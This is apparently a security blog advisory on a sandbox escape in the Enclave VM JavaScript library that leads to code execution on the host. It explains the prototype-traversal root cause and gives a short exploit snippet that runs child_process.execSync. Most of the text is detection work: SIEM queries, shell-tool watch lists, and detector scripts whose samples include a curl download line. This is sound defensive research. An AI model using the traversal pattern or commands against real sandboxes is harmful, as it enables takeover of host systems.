CVE-2026-27597: Critical Enclave VM Sandbox Escape Enables Full Remote Code Execution on Host Systems

CVE-2026-27597

CVE ID: CVE-2026-27597
Product: Enclave VM (@enclave-vm/core)
Vulnerability Type: JavaScript Sandbox Escape → Remote Code Execution (RCE)
Affected Versions: ≤ 2.10.1
Patched Version: 2.11.1
CVSS v3.1 Score: 10.0 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Severity: Critical
Exploitability: Low complexity, no privileges required
Exploit Availability: Public Proof-of-Concept available


Overview

A critical sandbox escape vulnerability was identified in Enclave VM (@enclave-vm/core). The issue allows attacker-supplied JavaScript code to escape the intended isolation boundary and execute arbitrary commands on the underlying host system.

The vulnerability affects applications that execute untrusted JavaScript inside Enclave instances. If user-controlled code is passed into enclave.run() or equivalent execution methods, full system compromise may occur.

The issue results from improper isolation between sandboxed JavaScript objects and host-level objects. Certain prototype and constructor traversal paths were not fully restricted. This allowed access to internal host references, ultimately enabling execution of Node.js native functionality such as child_process.

This is a complete sandbox breakout leading to Remote Code Execution.


Technical Root Cause

The vulnerability stems from insufficient hardening of:

  • Prototype chain traversal
  • Constructor references
  • Host object exposure
  • Memory tracking internals
  • Node.js inspect hooks

Improper wrapping of native constructors allowed the sandbox to expose references to real host objects instead of fully isolated proxies.

Through prototype traversal patterns such as:

{}.__proto__.constructor

access was gained to the native Object constructor rather than the restricted sandbox version.

Using:

Object.getOwnPropertyDescriptors(this)

the internal properties of the execution context could be enumerated. In certain configurations, host references such as:

__host_memory_track__

or Node inspection symbols like:

Symbol.for('nodejs.util.inspect.custom')

could be leveraged to retrieve host-level objects.

Once a host reference was obtained, execution of:

process.mainModule.require('child_process').execSync(...)

or equivalent methods became possible.

This allowed direct OS command execution.


Attack Chain

  1. Untrusted JavaScript submitted to an application using Enclave.
  2. Prototype traversal performed to reach native constructors.
  3. Enumeration of hidden properties.
  4. Extraction of host-bound reference.
  5. Access to Node.js internals (process, child_process).
  6. Arbitrary command execution on host.
  7. Potential persistence or lateral movement.

No authentication, user interaction, or special permissions were required.


Impact

If exploited successfully:

  • Full remote code execution
  • Data exfiltration
  • Credential theft
  • Container or VM breakout (if insufficiently isolated)
  • Deployment of reverse shells
  • Installation of persistence mechanisms
  • Lateral movement within infrastructure

Any system running Enclave VM with untrusted input exposure must be considered at risk.


MITRE ATT&CK Mapping

  • T1611 – Escape to Host
  • T1059 – Command and Scripting Interpreter
  • T1106 – Native API
  • T1497 – Virtualization/Sandbox Evasion
  • T1027 – Obfuscated/Hidden Code (if payload is encoded)

Proof of Concept (Educational)

Public proof-of-concept examples demonstrate:

  • Constructor traversal
  • Descriptor enumeration
  • Host object extraction
  • Execution of id, whoami, or shell commands

A typical exploitation pattern involves:

const host = getHostReference();
const process = host.constructor("return process")();
process.mainModule.require("child_process").execSync("id");

This is provided strictly for defensive awareness and educational security research.


Exploitation Characteristics

Indicators During Exploitation

  • Use of __proto__
  • Use of .constructor
  • Calls to getOwnPropertyDescriptors
  • Access to __host_memory_track__
  • Invocation of Symbol.for('nodejs.util.inspect.custom')
  • Execution of child_process.execSync
  • Spawning of shell processes from Node runtime

Detection

Detection should focus on behavioral monitoring rather than static signatures.

1. Process Creation Monitoring

Linux Auditd Query

ausearch -k node_exec

Audit rule example (adjust exe= to the path of the Node binary actually installed on the host; the rule records every execve issued by a Node process under the node_exec key that the ausearch command above retrieves):

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/node -k node_exec

Look for:

  • /bin/sh
  • bash -c
  • id
  • whoami
  • curl
  • wget

Elastic KQL

process.parent.name: "node" AND 
process.name: ("sh" OR "bash" OR "curl" OR "wget")

Splunk Query

index=process_logs parent_process=node 
| search process_name IN ("sh","bash","curl","wget")
| table _time host user parent_process process_name command_line

Microsoft Defender Advanced Hunting (KQL)

DeviceProcessEvents
| where InitiatingProcessFileName == "node.exe"
| where FileName in~ ("cmd.exe","powershell.exe","bash.exe")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine
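The Elastic, Splunk and Defender queries above all express the same rule: a shell or downloader spawned with a Node runtime as its parent. The following is an added example, not code from the advisory or from the Enclave VM project, that implements that rule as a small Node.js script over constructed process-creation events. The event field names (parent_image, image, command_line), the severity weighting, and the sample values (including the documentation-range address 198.51.100.7) are assumptions made for the example.

```javascript
// Added example (not from the advisory or the Enclave VM project): the process-lineage
// rule behind the Elastic, Splunk and Defender queries above, implemented over
// constructed process-creation events so it can run offline.

// Parent images that identify a Node.js runtime, and the child images the advisory's
// queries flag when Node spawns them.
const NODE_PARENTS = new Set(["node", "node.exe"]);
const SUSPICIOUS_CHILDREN = new Set([
  "sh", "bash", "dash",                      // shells (Linux)
  "curl", "wget",                            // downloaders (Linux)
  "cmd.exe", "powershell.exe", "bash.exe",   // shells (Windows, as in the Defender query)
]);
// Discovery commands the auditd guidance lists; their presence raises severity.
const DISCOVERY_RE = /\b(id|whoami)\b/;
const DOWNLOADERS = new Set(["curl", "wget"]);

// Last path component, lower-cased, for both / and \ separators.
function basename(path) {
  return String(path).split(/[\\/]/).pop().toLowerCase();
}

// Event fields follow an assumed Sysmon/ECS-like shape: parent_image, image, command_line.
// Returns an alert object, or null when the event does not match the rule.
function classifyEvent(ev) {
  const parent = basename(ev.parent_image || "");
  const child = basename(ev.image || "");
  if (!NODE_PARENTS.has(parent) || !SUSPICIOUS_CHILDREN.has(child)) return null;
  const cmd = ev.command_line || "";
  // Severity weighting is an assumption: discovery commands or downloaders rank "high".
  const severity = DISCOVERY_RE.test(cmd) || DOWNLOADERS.has(child) ? "high" : "medium";
  return { ts: ev.ts, host: ev.host, user: ev.user, parent, child, cmd, severity };
}

// Apply the rule to a batch of events; mirrors the `| table ...` projection in the queries.
function detectNodeSpawns(events) {
  return events.map(classifyEvent).filter((a) => a !== null);
}

// Constructed sample events: the first two are benign, the remaining four should alert.
const SAMPLE_EVENTS = [
  { ts: "2026-03-01T10:00:00Z", host: "app-1", user: "svc-enclave",
    parent_image: "/usr/bin/node", image: "/usr/bin/node", command_line: "node worker.js" },
  { ts: "2026-03-01T10:00:05Z", host: "app-1", user: "root",
    parent_image: "/usr/sbin/cron", image: "/bin/sh", command_line: "/bin/sh -c logrotate" },
  { ts: "2026-03-01T10:01:00Z", host: "app-1", user: "svc-enclave",
    parent_image: "/usr/bin/node", image: "/bin/sh", command_line: "/bin/sh -c id" },
  { ts: "2026-03-01T10:01:02Z", host: "app-1", user: "svc-enclave",
    parent_image: "/usr/bin/node", image: "/usr/bin/curl", command_line: "curl http://198.51.100.7/x" },
  { ts: "2026-03-01T10:01:10Z", host: "app-1", user: "svc-enclave",
    parent_image: "/usr/bin/node", image: "/bin/bash", command_line: "bash -c 'cat /etc/hostname'" },
  { ts: "2026-03-01T10:02:00Z", host: "win-2", user: "svc-enclave",
    parent_image: "C:\\Program Files\\nodejs\\node.exe", image: "C:\\Windows\\System32\\cmd.exe",
    command_line: "cmd.exe /c whoami" },
];

for (const a of detectNodeSpawns(SAMPLE_EVENTS)) {
  console.log(`[${a.severity}] ${a.ts} ${a.host} ${a.user}: ${a.parent} -> ${a.child} :: ${a.cmd}`);
}
```

A Node service that legitimately spawns shells will produce "medium" alerts from this rule; tune the parent or child sets per service, or add the service account to an allow-list, rather than dropping the rule.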

2. Application Log Monitoring

Search for suspicious payload patterns:

Splunk

index=app_logs "enclave.run"
| search "__proto__" OR "constructor" OR "__host_memory_track__"

Elastic KQL

message: ("__proto__" OR "__host_memory_track__" OR "getOwnPropertyDescriptors")
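The Splunk and Elastic searches above match the raw indicator strings in application logs. As an added example, not code from the advisory or from the Enclave VM project, the script below scores a logged enclave.run payload against the same indicators and also normalises \uXXXX and \xXX escapes first, so an identifier written in escaped form (the encoded-payload case the ATT&CK mapping mentions under T1027) is still matched. The log line format (`<timestamp> enclave.run payload=<JSON string>`), the indicator weights and the alert threshold are assumptions made for the example.

```javascript
// Added example (not from the advisory or the Enclave VM project): a scanner for the
// payload indicators the advisory lists, run over constructed application log lines.

// Indicator patterns come from the advisory's indicator list; the weights are assumed.
const INDICATORS = [
  { name: "proto-traversal",    re: /__proto__/,                                          weight: 3 },
  { name: "constructor-access", re: /\.constructor\b|\["constructor"\]|\['constructor'\]/, weight: 2 },
  { name: "descriptor-enum",    re: /getOwnPropertyDescriptors?\s*\(/,                   weight: 2 },
  { name: "host-memory-track",  re: /__host_memory_track__/,                             weight: 5 },
  { name: "inspect-symbol",     re: /nodejs\.util\.inspect\.custom/,                      weight: 4 },
  { name: "child-process",      re: /child_process|execSync|spawnSync/,                   weight: 5 },
  { name: "main-module",        re: /process\.mainModule/,                                weight: 4 },
];
const ALERT_THRESHOLD = 5; // assumed: single low-weight hits are common in benign code

// Decode \uXXXX and \xXX escapes so an escaped identifier does not slip past the patterns.
function normalise(src) {
  return src
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Score one submitted script (or one logged payload) and report the matched indicators.
function scanPayload(src) {
  const text = normalise(src);
  const matched = INDICATORS.filter((i) => i.re.test(text));
  const score = matched.reduce((s, i) => s + i.weight, 0);
  return { score, hits: matched.map((i) => i.name), alert: score >= ALERT_THRESHOLD };
}

// Extract the payload from a log line of the assumed form
// `<ts> enclave.run payload=<JSON string>`; other lines return null.
function scanLogLine(line) {
  const m = /enclave\.run payload=(".*")$/.exec(line);
  if (!m) return null;
  return { ts: line.slice(0, 20), ...scanPayload(JSON.parse(m[1])) };
}

function scanLog(lines) {
  return lines.map(scanLogLine).filter((r) => r !== null);
}

// Constructed sample log lines. Line 3 carries the host reference name with its
// underscores written as \u005f escapes inside the logged JavaScript source.
const SAMPLE_LOG = [
  '2026-03-01T10:00:00Z enclave.run payload="return [1,2,3].map(x => x * 2)"',
  '2026-03-01T10:01:00Z enclave.run payload="({}).__proto__.constructor; Object.getOwnPropertyDescriptors(this)"',
  String.raw`2026-03-01T10:01:30Z enclave.run payload="this[\"\\u005f\\u005fhost_memory_track\\u005f\\u005f\"]"`,
  '2026-03-01T10:02:00Z worker heartbeat ok',
];

for (const r of scanLog(SAMPLE_LOG)) {
  console.log(`${r.ts} score=${r.score} alert=${r.alert} hits=${r.hits.join(",") || "-"}`);
}
```

Run the same scanPayload function on code before it is handed to the sandbox to reject obvious traversal attempts up front; it is a cheap first filter, not a substitute for the upgrade, because string matching cannot reason about code that builds property names at runtime.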

3. Network Monitoring

Outbound connections from a Node service immediately after code execution:

process.name: "node" AND network.direction: "outgoing"

Look for:

  • Unknown IP addresses
  • DNS anomalies
  • Reverse shell patterns

Log Sources Required

  • Process creation logs (Sysmon / Auditd / EDR)
  • Application runtime logs
  • Container runtime logs (if applicable)
  • Network flow logs
  • Node.js debug logs (if enabled)
  • Cloud workload protection logs (for containerized deployments)

Forensic Investigation Guidance

If exploitation is suspected:

  1. Isolate affected host.
  2. Collect process creation logs.
  3. Dump Node process memory if possible.
  4. Review shell history of service account.
  5. Inspect /tmp, /var/tmp, application directories.
  6. Review cron jobs and systemd services.
  7. Rotate all credentials accessible by the host.
  8. Rebuild system if compromise is confirmed.

Mitigation

Immediate Actions

  • Upgrade to version 2.11.1 or later.
  • Disable execution of untrusted JavaScript until patching is completed.
  • Restrict network access to Enclave services.
  • Run Enclave inside a hardened container or dedicated VM.
  • Remove unnecessary system privileges.

Defense-in-Depth

  • Apply seccomp profiles for containers.
  • Disable outbound internet access if not required.
  • Enforce strict RBAC.
  • Monitor child process creation from Node.

Risk Assessment

Any exposed Enclave instance executing user-controlled JavaScript should be considered highly vulnerable.

Given the availability of a public PoC and the low-complexity exploitation path, the risk of active exploitation is high.

Systems used for:

  • AI agent execution
  • SaaS code runners
  • Server-side plugin engines
  • Multi-tenant JS execution platforms

are particularly exposed.


Remediation

Upgrade to:

@enclave-vm/core version 2.11.1 or later

Official patch information:
https://github.com/advisories/GHSA-f229-3862-4942

No reliable workaround exists other than upgrading.


Conclusion

CVE-2026-27597 represents a complete breakdown of sandbox isolation within Enclave VM. The vulnerability allows untrusted JavaScript to cross isolation boundaries and execute arbitrary operating system commands.

Given the severity, public exploit availability, and low attack complexity, immediate patching and monitoring are strongly advised.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.